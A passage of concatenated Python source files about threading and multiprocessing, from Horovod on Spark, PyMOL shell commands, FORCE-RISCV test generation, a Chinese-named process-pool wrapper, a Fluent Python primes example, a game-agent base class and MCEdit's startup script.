return spark_thread
def _launch_job(use_mpi, use_gloo, settings, driver, env, stdout=None, stderr=None):
# Determine a set of common interfaces for task-to-task communication.
nics = set(driver.task_addresses_for_tasks(0).keys())
for index in range(1, settings.num_proc):
nics.intersection_update(driver.task_addresses_for_tasks(index).keys())
if not nics:
raise Exception('Unable to find a set of common task-to-task communication interfaces: %s'
% [(index, driver.task_addresses_for_tasks(index)) for index in range(settings.num_proc)])
run_controller(use_gloo, lambda: gloo_run(settings, nics, driver, env),
use_mpi, lambda: mpi_run(settings, nics, driver, env, stdout, stderr),
False, lambda: None,
settings.verbose)
def run(fn, args=(), kwargs={}, num_proc=None, start_timeout=None,
use_mpi=None, use_gloo=None, extra_mpi_args=None,
env=None, stdout=None, stderr=None, verbose=1, nics=None):
"""
Runs Horovod in Spark. Runs `num_proc` processes executing `fn` using the same amount of Spark tasks.
Args:
fn: Function to run.
args: Arguments to pass to `fn`.
kwargs: Keyword arguments to pass to `fn`.
num_proc: Number of Horovod processes. Defaults to `spark.default.parallelism`.
start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
If not set, falls back to `HOROVOD_SPARK_START_TIMEOUT` environment variable value.
If it is not set as well, defaults to 600 seconds.
extra_mpi_args: Extra arguments for mpi_run. Defaults to no extra args.
env: Environment dictionary to use in Horovod run.
stdout: Horovod stdout is redirected to this stream. Defaults to sys.stdout.
stderr: Horovod stderr is redirected to this stream. Defaults to sys.stderr.
verbose: Debug output verbosity (0-2). Defaults to 1.
nics: List of NICs for tcp network communication.
Returns:
List of results returned by running `fn` on each rank.
"""
if start_timeout is None:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv('HOROVOD_SPARK_START_TIMEOUT', '600'))
# nics needs to be a set
if nics and not isinstance(nics, set):
nics = set(nics)
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Horovod processes. Each Horovod '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = hvd_settings.Settings(verbose=verbose,
extra_mpi_args=extra_mpi_args,
key=secret.make_secret_key(),
timeout=tmout,
nics=nics,
run_func_mode=True)
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
if num_proc is None:
num_proc = spark_context.defaultParallelism
if settings.verbose >= 1:
print('Running %d processes (inferred from spark.default.parallelism)...' % num_proc)
else:
if settings.verbose >= 1:
print('Running %d processes...' % num_proc)
settings.num_proc = num_proc
result_queue = queue.Queue(1)
# start Spark driver service and launch settings.num_proc Spark tasks
spark_job_group = 'horovod.spark.run.%d' % job_id.next_job_id()
driver = driver_service.SparkDriverService(settings.num_proc, fn, args, kwargs,
settings.key, settings.nics)
spark_thread = _make_spark_thread(spark_context, spark_job_group, driver,
result_queue, settings, use_gloo)
try:
# wait for all tasks to register and notify them
driver.wait_for_initial_registration(settings.timeout)
if settings.verbose >= 2:
print('Initial Spark task registration is complete.')
task_clients = [
task_service.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
settings.key, settings.verbose)
for index in range(settings.num_proc)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
driver.wait_for_task_to_task_address_updates(settings.timeout)
if settings.verbose >= 2:
print('Spark task-to-task address registration is complete.')
# Determine the index grouping based on host hashes.
# Barrel shift until index 0 is in the first host.
host_hashes = list(driver.task_host_hash_indices().keys())
host_hashes.sort()
while 0 not in driver.task_host_hash_indices()[host_hashes[0]]:
host_hashes = host_hashes[1:] + host_hashes[:1]
settings.hosts = ','.join('%s:%d' % (host_hash, len(driver.task_host_hash_indices()[host_hash]))
for host_hash in host_hashes)
# Determine the ranks to indicies
ranks_to_indices = []
for host_hash in host_hashes:
ranks_to_indices += driver.task_host_hash_indices()[host_hash]
driver.set_ranks_to_indices(ranks_to_indices)
# Run the job
_launch_job(use_mpi, use_gloo, settings, driver, env, stdout, stderr)
except:
# Terminate Spark job.
spark_context.cancelJobGroup(spark_job_group)
# Re-raise exception.
raise
finally:
spark_thread.join()
driver.shutdown()
# Make sure Spark Job did not fail.
driver.check_for_spark_job_failure()
# If there's no exception, execution results are in this queue.
results = result_queue.get_nowait()
return [results[index] for index in ranks_to_indices]
|
externing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
if __name__=='pymol.externing':
import os
import pymol
import string
import parsing
import threading
import cmd
import traceback
from glob import glob
from cmd import _cmd,lock,unlock,Shortcut,QuietException, \
_feedback,fb_module,fb_mask, exp_path, \
DEFAULT_ERROR, DEFAULT_SUCCESS, _raising, is_ok, is_error
def cd(dir="~",complain=1,quiet=1):
'''
DESCRIPTION
"cd" changes the current working directory.
USAGE
cd <path>
SEE ALSO
pwd, ls, system
'''
dir = exp_path(dir)
try:
os.chdir(dir) # raises on error
if not quiet:
print " cd: now in %s"%os.getcwd()
except:
if complain:
traceback.print_exc()
return DEFAULT_SUCCESS
def pwd():
'''
DESCRIPTION
Print current working directory.
USAGE
pwd
SEE ALSO
cd, ls, system
'''
print os.getcwd()
return DEFAULT_SUCCESS
def ls(pattern=None):
'''
DESCRIPTION
List contents of the current working directory.
USAGE
ls [pattern]
dir [pattern]
EXAMPLES
ls
ls *.pml
SEE ALSO
cd, pwd, system
'''
if pattern==None:
pattern = "*"
else:
pattern = exp_path(pattern)
if '*' not in pattern:
lst = glob(os.path.join(pattern, '*'))
else:
lst = []
if not len(lst):
lst = glob(pattern)
if len(lst):
lst.sort()
lst = parsing.list_to_str_list(lst)
for a in lst:
print a
else:
print " ls: Nothing found. Is that a valid path?"
return DEFAULT_SUCCESS
def system(command,async=0,_self=cmd):
'''
DESCRIPTION
"system" executes a command in a subshell under Unix or Windows.
USAGE
system command
PYMOL API
cmd.system(string command,int async=0)
NOTES
async can only be specified from the Python level (not the command language)
if async is 0 (default), then the result code from "system" is returned in r
if async is 1, then the command is run in a separate thread whose object is
returned
SEE ALSO
ls, cd, pwd
'''
r = None
if async:
r = threading.Thread(target=_cmd.system,args=(str(command),1))
r.start()
else:
r = _cmd.system(_self._COb,str(command),0)
return r # special meaning
def paste(_self=cmd): # INTERNAL
r=DEFAULT_SUCCESS
lst = []
if hasattr(pymol,"machine_get_clipboard"):
lst = pymol.machine_get_clipboard()
if len(lst):
new_lst = []
for a in lst:
while len(a):
if ord(a[-1])>32:
break
else:
a=a[:-1]
# if nothing in the queue, this special string is printed; so
# we ignore it
if len(a):
if a=="""PRIMARY selection doesn't exist or form "STRING" not defined""":
new_list = []
else:
new_lst.append(a)
r = _cmd.paste(_self._COb,new_lst)
if _raising(r,_self): raise pymol.CmdException
return r
|
GenThreadExecutor.py
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR
# FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import threading
import traceback
from ThreadDispatcher import ThreadDispatcher, SingleThreadDispatcher, MultiThreadDispatcher
import Log
## @package GenThreadExecutor
#
# Mainly two versions of generator threads, one for single-thread test generation, one for multi-thread test generation.
## Abstract base class for GenThreadExecutor
#
class GenThreadExecutor(abc.ABC):
## Common base __init__ method.
def __init__(self):
self.mSingleThreadDispatcher = SingleThreadDispatcher()
def getDispatcher(self):
return self.mSingleThreadDispatcher
## Notify the exeuctor of the main generator thread ID for the before and after main test
# processing.
def setMainThreadId(self, aThreadId):
self.mSingleThreadDispatcher.addThreadId(aThreadId)
## Interface method to execute generator threads.
#
@abc.abstractmethod
def executeGenThreads(self, aGenThreads):
raise NotImplementedError
## Static method used by base classes to execute a generator thread.
#
@staticmethod
def executeGenThread(aGenThread):
try:
aGenThread.setup()
aGenThread.generate()
aGenThread.cleanUp()
except Exception as exc:
err_str = traceback.format_exception_only(type(exc), exc)[-1]
err_str += ''.join(traceback.format_tb(exc.__traceback__))
Log.fail(err_str)
## Generator executor class for single-thread test generation.
#
class SingleGenThreadExecutor(GenThreadExecutor):
def __init__(self):
super().__init__()
## Execute single generator thread
#
def executeGenThreads(self, aGenThreads):
# To avoid unnecessarily impairing performance for the case where there is only one GenThread, execute it on
# the main thread
assert (len(aGenThreads) == 1), 'SingleGenThreadExecutor was used to execute more than one GenThread!'
return GenThreadExecutor.executeGenThread(aGenThreads[0])
## Generator executor class for multi-thread test generation.
#
class MultiGenThreadExecutor(GenThreadExecutor):
## Setup multi-thread dispatcher.
#
def __init__(self):
super().__init__()
self.mMultiThreadDispatcher = MultiThreadDispatcher()
self.mGenThreads = None
## Execute the generator threads in pseudo random concurrent fashion.
#
def executeGenThreads(self, aGenThreads):
ex_threads = []
self.mGenThreads = aGenThreads
start_barrier = threading.Barrier(len(aGenThreads))
for gen_thread in aGenThreads:
ex_thread = threading.Thread(target=MultiGenThreadExecutor.executeGenThreadControlledStart, args=[gen_thread, self.mMultiThreadDispatcher, start_barrier])
ex_threads.append(ex_thread)
with ThreadingEnableContextManager(self):
for ex_thread in ex_threads:
ex_thread.start()
for ex_thread in ex_threads:
ex_thread.join()
@staticmethod
def executeGenThreadControlledStart(aGenThread, aDispatcher, aStartBarrier):
with ExecutionContextManager(aGenThread.genThreadID, aDispatcher, aStartBarrier):
GenThreadExecutor.executeGenThread(aGenThread)
## Use this context manager to control swapping in and out the multi-threading API call dispatcher.
#
class ThreadingEnableContextManager:
def __init__(self, executor):
self.mExecutor = executor
## Iterate through all GenThread objects to set their dispatcher to the multi-thread one.
#
def __enter__(self):
ThreadDispatcher.setCurrentDispatcher(self.mExecutor.mMultiThreadDispatcher)
for gen_thread in self.mExecutor.mGenThreads:
self.mExecutor.mMultiThreadDispatcher.addThreadId(gen_thread.genThreadID)
self.mExecutor.mMultiThreadDispatcher.start()
Log.noticeNoBlock("Multi-threading phase entered.")
return self
## Iterate through all GenThread objects to set their dispatcher back to the single-thread one.
#
def __exit__(self, *unused):
self.mExecutor.mMultiThreadDispatcher.stop()
Log.noticeNoBlock("Multi-threading phase exited.")
ThreadDispatcher.setCurrentDispatcher(self.mExecutor.mSingleThreadDispatcher)
return False
## Put in barrier at the thread starting phase so all threads will start orderly.
# Remove the thread ID from dispatcher so that all threads will finish orderly.
class ExecutionContextManager:
def __init__(self, aThreadId, aDispatcher, aStartBarrier):
self.mThreadId = aThreadId
self.mDispatcher = aDispatcher
self.mStartBarrier = aStartBarrier
## Add thread ID to dispatcher.
#
def __enter__(self):
self.mDispatcher.registerExecutionThread(self.mThreadId)
self.mStartBarrier.wait()
return self
## Remove thread ID from dispatcher
#
def __exit__(self, *aUnused):
self.mDispatcher.reportThreadDone()
return False
## Factory class to return the correct GenThreadExecutor object.
#
class GenThreadExecutorFactory:
@staticmethod
def createGenThreadExecutor(genThreadCount):
if genThreadCount == 1:
executor = SingleGenThreadExecutor()
else:
executor = MultiGenThreadExecutor()
ThreadDispatcher.setCurrentDispatcher(executor.mSingleThreadDispatcher)
return executor
|
processPoolUtil.py
|
"""
.. Hint::
进程池使用方法
方便的使用python开启多进程
.. literalinclude:: ..\..\..\example\进程池测试.py
:language: python
:caption: 代码示例
:linenos:
:lines: 1-40
"""
import multiprocessing
from pyefun import 事件锁
class 进程队列:
def __init__(self):
self.队列对象 = multiprocessing.Queue()
def 加入数据(self, 要加入的数据):
self.队列对象.put(要加入的数据)
def 获取数据(self):
return self.队列对象.get()
class 进程:
def __init__(self, 子程序名, 元组参数=(), 字典参数={}, 进程名=None):
self.进程对象 = multiprocessing.Process(target=子程序名, args=元组参数, kwargs=字典参数, name=进程名)
def 启动(self):
self.进程对象.start()
def 关闭(self):
self.进程对象.close()
def 等待进程(self, 超时时间=None):
"""如果可选参数timeout是None,则该方法将阻塞,直到join()调用其方法的进程终止。如果timeout是一个正数,它最多会阻塞超时秒。请注意,None如果方法的进程终止或方法超时,则返回该方法。检查进程exitcode以确定它是否终止。"""
self.进程对象.join(超时时间)
def 取进程名(self):
return self.进程对象.name
def 是否存在(self):
"""返回逻辑型"""
return self.进程对象.is_alive()
def 取pid(self):
return self.进程对象.pid
def 终止子进程(self):
"""子进程的退出代码。None如果流程尚未终止,这将是。负值-N表示孩子被信号N终止。"""
return self.进程对象.exitcode
def 守护(self, 是否守护进程=True):
""" 这个必须在 进程启动先 设置,否则无效 进程的守护进程标志,一个布尔值。必须在start()调用之前设置,当进程退出时,它会尝试终止其所有守护进程子进程。"""
self.进程对象.daemon = 是否守护进程
class 进程池():
def __init__(self, 进程数, 投递任务时阻塞=True):
self.进程池对象 = multiprocessing.Pool(processes=进程数)
self.投递任务时阻塞 = 投递任务时阻塞
if (投递任务时阻塞 == True):
self.已投递任务数量 = 0
self.最大线程数量 = 进程数
self.锁 = 事件锁()
def 投递任务(self, 子程序, 回调函数=None, 回调报错=None, *args, **kwds):
if self.投递任务时阻塞:
if (self.已投递任务数量 >= self.最大线程数量):
self.锁.堵塞()
self.锁.等待()
self.已投递任务数量 = self.已投递任务数量 + 1
if self.投递任务时阻塞:
回调函数保存 = 回调函数
def 回调函数x(e):
self.已投递任务数量 = self.已投递任务数量 - 1
self.锁.通行()
if 回调函数保存 != None:
回调函数保存(e)
回调函数 = 回调函数x
回调报错 = 回调函数x
启动对象 = self.进程池对象.apply_async(func=子程序, args=args, kwds=kwds, callback=回调函数, error_callback=回调报错)
return 启动对象
def 投递任务2(self, 子程序, 迭代列表):
"""这个用的少,一个子程序报错,全部会报错,后面的函数没有补全了"""
启动对象 = self.进程池对象.map_async(func=子程序, iterable=迭代列表)
return 启动对象
def 等待(self):
self.停止添加子进程()
self.等待子进程结束()
def 停止添加子进程(self):
""" 防止任何更多的任务被提交到池中。 一旦完成所有任务,工作进程将退出。"""
self.进程池对象.close()
def 终止所有子进程(self):
"""立即停止工作进程而不完成未完成的工作。当池对象被垃圾收集时,terminate()将立即调用。;"""
self.进程池对象.terminate()
def 等待子进程结束(self):
""" 等待工作进程退出。必须打电话close()或 terminate()使用之前join()。"""
self.进程池对象.join()
def 取返回值(self, 启动对象):
return 启动对象.get()
|
procs.py
|
#!/usr/bin/env python3
"""
procs.py: shows that multiprocessing on a multicore machine
can be faster than sequential code for CPU-intensive work.
"""
# tag::PRIMES_PROC_TOP[]
import sys
from time import perf_counter
from typing import NamedTuple
from multiprocessing import Process, SimpleQueue, cpu_count # <1>
from multiprocessing import queues # <2>
from primes import is_prime, NUMBERS
class PrimeResult(NamedTuple): # <3>
n: int
prime: bool
elapsed: float
JobQueue = queues.SimpleQueue # <4>
ResultQueue = queues.SimpleQueue # <5>
def check(n: int) -> PrimeResult: # <6>
t0 = perf_counter()
res = is_prime(n)
return PrimeResult(n, res, perf_counter() - t0)
def worker(jobs: JobQueue, results: ResultQueue) -> None: # <7>
while True:
n = jobs.get() # <8>
if n == 0:
break
results.put(check(n)) # <9>
# end::PRIMES_PROC_TOP[]
# tag::PRIMES_PROC_MAIN[]
def main() -> None:
if len(sys.argv) < 2: # <1>
workers = cpu_count()
else:
workers = int(sys.argv[1])
print(f'Checking {len(NUMBERS)} numbers with {workers} processes:')
jobs: JobQueue = SimpleQueue() # <2>
results: ResultQueue = SimpleQueue()
t0 = perf_counter()
for n in NUMBERS: # <3>
jobs.put(n)
for _ in range(workers):
proc = Process(target=worker, args=(jobs, results)) # <4>
proc.start() # <5>
jobs.put(0) # <6>
while True:
n, prime, elapsed = results.get() # <7>
label = 'P' if prime else ' '
print(f'{n:16} {label} {elapsed:9.6f}s') # <8>
if jobs.empty(): # <9>
break
elapsed = perf_counter() - t0
print(f'Total time: {elapsed:.2f}s')
if __name__ == '__main__':
main()
# end::PRIMES_PROC_MAIN[]
|
baseThreadedAgent.py
|
from threading import Thread
from time import sleep
from agents.baseAgent import baseAgent
class baseThreadedAgent(baseAgent):
'''Extends baseAgent in order to provide multithreading functionality.
Attributes:
thread (Thread): Thread used by agent to do precalculations.
isStopping (bool): Whether the thread is being interrupted. Should not be set.
expected (dict): The expected future states and the optimal moves for those states.
move (tuple): The current move, I think.
'''
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.thread = None
self.isStopping = False
self.expected = {} #state and move pairs
self.move = None
#Extendables
#setter
def update(self,state,curPiece):
super().update(state,curPiece)
if self.thread != None:
self.isStopping = True
self.thread.join()
self.thread = None
self.isStopping = False
self.thread = Thread(target = self.calculate())
self.thread.start()
return
#for classes to implement
def calculate(self):
'''How precalculations should be done. Should be overrided.'''
pass
#getter
def getMove(self,state=None):
super().getMove(state)
while(self.move == None):
sleep(5)
move = tuple(self.move)
self.move = None
return move
|
mcedit.py
|
# !/usr/bin/env python2.7
# -*- coding: utf_8 -*-
# import resource_packs # not the right place, moving it a bit further
#-# Modified by D.C.-G. for translation purpose
#.# Marks the layout modifications. -- D.C.-G.
from __future__ import unicode_literals
"""
mcedit.py
Startup, main menu, keyboard configuration, automatic updating.
"""
import splash
import OpenGL
import sys
import os
if "--debug-ogl" not in sys.argv:
OpenGL.ERROR_CHECKING = False
import logging
# Setup file and stderr logging.
logger = logging.getLogger()
# Set the log level up while importing OpenGL.GL to hide some obnoxious warnings about old array handlers
logger.setLevel(logging.WARN)
logger.setLevel(logging.DEBUG)
logfile = 'mcedit.log'
if sys.platform == "darwin":
logfile = os.path.expanduser("~/Library/Logs/mcedit.log")
else:
logfile = os.path.join(os.getcwdu(), logfile)
fh = logging.FileHandler(logfile, mode="w")
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.WARN)
if "--log-info" in sys.argv:
ch.setLevel(logging.INFO)
if "--log-debug" in sys.argv:
ch.setLevel(logging.DEBUG)
class FileLineFormatter(logging.Formatter):
def format(self, record):
record.__dict__['fileline'] = "%(module)s.py:%(lineno)d" % record.__dict__
record.__dict__['nameline'] = "%(name)s.py:%(lineno)d" % record.__dict__
return super(FileLineFormatter, self).format(record)
fmt = FileLineFormatter(
'[%(levelname)8s][%(nameline)30s]:%(message)s'
)
fh.setFormatter(fmt)
ch.setFormatter(fmt)
logger.addHandler(fh)
logger.addHandler(ch)
import release
if __name__ == "__main__":
start_msg = 'Starting MCEdit-Unified v%s' % release.TAG
logger.info(start_msg)
print '[ ****** ] ~~~~~~~~~~ %s' % start_msg
#---------------------------------------------------------------------
# NEW FEATURES HANDLING
#
# The idea is to be able to implement and test/use new code without stripping off the current one.
# These features/new code will be in the released stuff, but unavailable until explicitly requested.
#
# The new features which are under development can be enabled using the 'new_features.def' file.
# This file is a plain text file with one feature to enable a line.
# The file is parsed and each feature is added to the builtins using the pattern 'mcenf_<feature>'.
# The value for these builtins is 'True'.
# Then, in the code, just check if the builtins has the key 'mcenf_<feature>' to use the new version of the code:
#
# ```
# def foo_old():
# # Was 'foo', code here is the one used unless the new version is wanted.
# [...]
#
# def foo_new():
# # This is the new version of the former 'foo' (current 'foo_old').
# [...]
#
# if __builtins__.get('mcenf_foo', False):
# foo = foo_new
# else:
# foo = foo_old
#
# ```
#
if __name__ == "__main__" and '--new-features' in sys.argv:
if not os.path.exists('new_features.def'):
logger.warning("New features requested, but file 'new_features.def' not found!")
else:
logger.warning("New features mode requested.")
lines = [a.strip() for a in open('new_features.def', 'r').readlines()]
for line in lines:
_ln = line.strip()
if _ln and not _ln.startswith("#"):
setattr(__builtins__, 'mcenf_%s' % line, True)
logger.warning("Activating 'mcenf_%s'" % line)
logger.warning("New features list loaded.")
from player_cache import PlayerCache
import directories
import keys
import albow
import locale
DEF_ENC = locale.getdefaultlocale()[1]
if DEF_ENC is None:
DEF_ENC = "UTF-8"
from albow.translate import _, getPlatInfo
from albow.openglwidgets import GLViewport
from albow.root import RootWidget
from config import config
if __name__ == "__main__":
#albow.resource.resource_dir = directories.getDataDir()
albow.resource.resource_dir = directories.getDataFile()
def create_mocked_pyclark():
import imp
class MockedPyClark(object):
class Clark(object):
def report(self, *args, **kwargs):
pass
global_clark = Clark()
mod = imp.new_module('pyClark')
mod = MockedPyClark()
sys.modules['pyClark'] = mod
return mod
global pyClark
pyClark = None
if getattr(sys, 'frozen', False) or '--report-errors' in sys.argv:
if config.settings.reportCrashes.get():
try:
import pyClark
pyClark.Clark('http://127.0.0.1', inject=True)
logger.info('Successfully setup pyClark')
except ImportError:
pyClark = create_mocked_pyclark()
logger.info('The \'pyClark\' module has not been installed, disabling error reporting')
pass
else:
logger.info('User has opted out of pyClark error reporting')
print type(create_mocked_pyclark())
pyClark = create_mocked_pyclark()
print pyClark
else:
pyClark = create_mocked_pyclark()
import panels
import leveleditor
# Building translation template
if __name__ == "__main__" and "-tt" in sys.argv:
sys.argv.remove('-tt')
# Overwrite the default marker to have one adapted to our specific needs.
albow.translate.buildTemplateMarker = """
### THE FOLLOWING LINES HAS BEEN ADDED BY THE TEMPLATE UPDATE FUNCTION.
### Please, consider to analyze them and remove the entries referring
### to ones containing string formatting.
###
### For example, if you have a line already defined with this text:
### My %{animal} has %d legs.
### you may find lines like these below:
### My parrot has 2 legs.
### My dog has 4 legs.
###
### You also may have unwanted partial strings, especially the ones
### used in hotkeys. Delete them too.
### And, remove this paragraph, or it will be displayed in the program...
"""
albow.translate.buildTemplate = True
albow.translate.loadTemplate()
# Save the language defined in config and set en_US as current one.
logging.warning('MCEdit is invoked to update the translation template.')
orglang = config.settings.langCode.get()
logging.warning('The actual language is %s.' % orglang)
logging.warning('Setting en_US as language for this session.')
config.settings.langCode.set('en_US')
import mceutils
import mcplatform
# The two next switches '--debug-wm' and '--no-wm' are used to debug/disable the internal window handler.
# They are exclusive. You can't debug if it is disabled.
if __name__ == "__main__":
if "--debug-wm" in sys.argv:
mcplatform.DEBUG_WM = True
if "--no-wm" in sys.argv:
mcplatform.DEBUG_WM = False
mcplatform.USE_WM = False
else:
mcplatform.setupWindowHandler()
DEBUG_WM = mcplatform.DEBUG_WM
USE_WM = mcplatform.USE_WM
#-# DEBUG
if mcplatform.hasXlibDisplay and DEBUG_WM:
print '*** Xlib version', str(mcplatform.Xlib.__version__).replace(' ', '').replace(',', '.')[1:-1], 'found in',
if os.path.expanduser('~/.local/lib/python2.7/site-packages') in mcplatform.Xlib.__file__:
print 'user\'s',
else:
print 'system\'s',
print 'libraries.'
#-#
from mcplatform import platform_open
import numpy
from pymclevel.minecraft_server import ServerJarStorage
import os.path
import pygame
from pygame import display, rect
import pymclevel
import shutil
import traceback
import threading
from utilities.gl_display_context import GLDisplayContext
import mclangres
from utilities import mcver_updater, mcworld_support
getPlatInfo(OpenGL=OpenGL, numpy=numpy, pygame=pygame)
ESCAPE = '\033'
class MCEdit(GLViewport):
def_enc = DEF_ENC
def __init__(self, displayContext, *args):
if DEBUG_WM:
print "############################ __INIT__ ###########################"
self.resizeAlert = config.settings.showWindowSizeWarning.get()
self.maximized = config.settings.windowMaximized.get()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
if displayContext.win and DEBUG_WM:
print "* self.displayContext.win.state", displayContext.win.get_state()
print "* self.displayContext.win.position", displayContext.win.get_position()
self.dis = None
self.win = None
self.wParent = None
self.wGrandParent = None
self.linux = False
if sys.platform == 'linux2' and mcplatform.hasXlibDisplay:
self.linux = True
self.dis = dis = mcplatform.Xlib.display.Display()
self.win = win = dis.create_resource_object('window', display.get_wm_info()['window'])
curDesk = os.environ.get('XDG_CURRENT_DESKTOP')
if curDesk in ('GNOME', 'X-Cinnamon', 'Unity'):
self.geomReciever = self.maximizeHandler = wParent = win.query_tree().parent
self.geomSender = wGrandParent = wParent.query_tree().parent
elif curDesk == 'KDE':
self.maximizeHandler = win.query_tree().parent
wParent = win.query_tree().parent.query_tree().parent
wGrandParent = wParent.query_tree().parent.query_tree().parent
self.geomReciever = self.geomSender = win.query_tree().parent.query_tree().parent.query_tree().parent
else:
self.maximizeHandler = self.geomReciever = self.geomSender = wGrandParent = wParent = None
self.wParent = wParent
self.wGrandParent = wGrandParent
root = dis.screen().root
windowID = root.get_full_property(dis.intern_atom('_NET_ACTIVE_WINDOW'), mcplatform.Xlib.X.AnyPropertyType).value[0]
print "###\nwindowID", windowID
window = dis.create_resource_object('window', windowID)
print "###\nwindow.get_geometry()", window.get_geometry()
print "###\nself.win", self.win.get_geometry()
print "###\nself.wParent.get_geometry()", self.wParent.get_geometry()
print "###\nself.wGrandParent.get_geometry()", self.wGrandParent.get_geometry()
try:
print "###\nself.wGrandParent.query_tree().parent.get_geometry()", self.wGrandParent.query_tree().parent.get_geometry()
except:
pass
print "###\nself.maximizeHandler.get_geometry()", self.maximizeHandler.get_geometry()
print "###\nself.geomReciever.get_geometry()", self.geomReciever.get_geometry()
print "###\nself.geomSender.get_geometry()", self.geomSender.get_geometry()
print "###\nself.win", self.win
print "###\nself.wParent", self.wParent
print "###\nself.wGrandParent", self.wGrandParent
print "###\nself.maximizeHandler", self.maximizeHandler
print "###\nself.geomReciever", self.geomReciever
print "###\nself.geomSender", self.geomSender
ws = displayContext.getWindowSize()
r = rect.Rect(0, 0, ws[0], ws[1])
GLViewport.__init__(self, r)
if DEBUG_WM:
print "self.size", self.size, "ws", ws
if displayContext.win and self.maximized:
# Send a maximize event now
displayContext.win.set_state(mcplatform.MAXIMIZED)
# Flip pygame.display to avoid to see the splash un-centered.
pygame.display.flip()
self.displayContext = displayContext
self.bg_color = (0, 0, 0, 1)
self.anchor = 'tlbr'
if not config.config.has_section("Recent Worlds"):
config.config.add_section("Recent Worlds")
self.setRecentWorlds([""] * 5)
self.optionsPanel = panels.OptionsPanel(self)
if not albow.translate.buildTemplate:
self.optionsPanel.getLanguageChoices()
lng = config.settings.langCode.get()
if lng not in self.optionsPanel.sgnal:
lng = "en_US"
config.settings.langCode.set(lng)
albow.translate.setLang(lng)
# Set the window caption here again, since the initialization is done through several steps...
display.set_caption(('MCEdit ~ ' + release.get_version() % _("for")).encode('utf-8'), 'MCEdit')
self.optionsPanel.initComponents()
self.graphicsPanel = panels.GraphicsPanel(self)
#.#
self.keyConfigPanel = keys.KeyConfigPanel(self)
#.#
self.droppedLevel = None
self.nbtCopyBuffer = None
self.reloadEditor()
"""
check command line for files dropped from explorer
"""
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
f = arg.decode(sys.getfilesystemencoding())
if os.path.isdir(os.path.join(pymclevel.minecraftSaveFileDir, f)):
f = os.path.join(pymclevel.minecraftSaveFileDir, f)
self.droppedLevel = f
break
if os.path.exists(f):
self.droppedLevel = f
break
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.fileOpener.focus()
#-# Translation live updtate preparation
def set_update_ui(self, v):
GLViewport.set_update_ui(self, v)
if v:
#&# Prototype for blocks/items names
if self.editor.level:
mclangres.buildResources(self.editor.level.gameVersion, albow.translate.getLang())
#&#
self.keyConfigPanel = keys.KeyConfigPanel(self)
self.graphicsPanel = panels.GraphicsPanel(self)
if self.fileOpener in self.subwidgets:
idx = self.subwidgets.index(self.fileOpener)
self.remove(self.fileOpener)
self.fileOpener = albow.FileOpener(self)
if idx is not None:
self.add(self.fileOpener)
self.fileOpener.focus()
#-#
editor = None
def reloadEditor(self):
reload(leveleditor)
level = None
pos = None
if self.editor:
level = self.editor.level
self.remove(self.editor)
c = self.editor.mainViewport
pos, yaw, pitch = c.position, c.yaw, c.pitch
self.editor = leveleditor.LevelEditor(self)
self.editor.anchor = 'tlbr'
if level:
self.add(self.editor)
self.editor.gotoLevel(level)
self.focus_switch = self.editor
if pos is not None:
c = self.editor.mainViewport
c.position, c.yaw, c.pitch = pos, yaw, pitch
def add_right(self, widget):
w, h = self.size
widget.centery = h // 2
widget.right = w
self.add(widget)
def showOptions(self):
self.optionsPanel.present()
def showGraphicOptions(self):
self.graphicsPanel.present()
def showKeyConfig(self):
self.keyConfigPanel.presentControls()
def loadRecentWorldNumber(self, i):
worlds = list(self.recentWorlds())
if i - 1 < len(worlds):
self.loadFile(worlds[i - 1])
numRecentWorlds = 5
@staticmethod
def removeLevelDat(filename):
if filename.endswith("level.dat"):
filename = os.path.dirname(filename)
return filename
def recentWorlds(self):
worlds = []
for i in xrange(self.numRecentWorlds):
if config.config.has_option("Recent Worlds", str(i)):
try:
filename = (config.config.get("Recent Worlds", str(i)).decode('utf-8'))
worlds.append(self.removeLevelDat(filename))
except Exception as e:
logging.error(repr(e))
return list((f for f in worlds if f and os.path.exists(f)))
def addRecentWorld(self, filename):
filename = self.removeLevelDat(filename)
rw = list(self.recentWorlds())
if filename in rw:
return
rw = [filename] + rw[:self.numRecentWorlds - 1]
self.setRecentWorlds(rw)
@staticmethod
def setRecentWorlds(worlds):
for i, filename in enumerate(worlds):
config.config.set("Recent Worlds", str(i), filename.encode('utf-8'))
def makeSideColumn1(self):
def showLicense():
#platform_open(os.path.join(directories.getDataDir(), "LICENSE.txt"))
platform_open(directories.getDataFile('LICENSE.txt'))
def refresh():
PlayerCache().force_refresh()
def update_mcver():
num = mcver_updater.run()
if num:
albow.alert("Version Definitions have been updated!\n\nPlease restart MCEdit-Unified to apply the changes")
else:
albow.alert("Version Definitions are already up-to-date!")
hotkeys = ([("",
"Controls",
self.showKeyConfig),
("",
"Graphics",
self.showGraphicOptions),
("",
"Options",
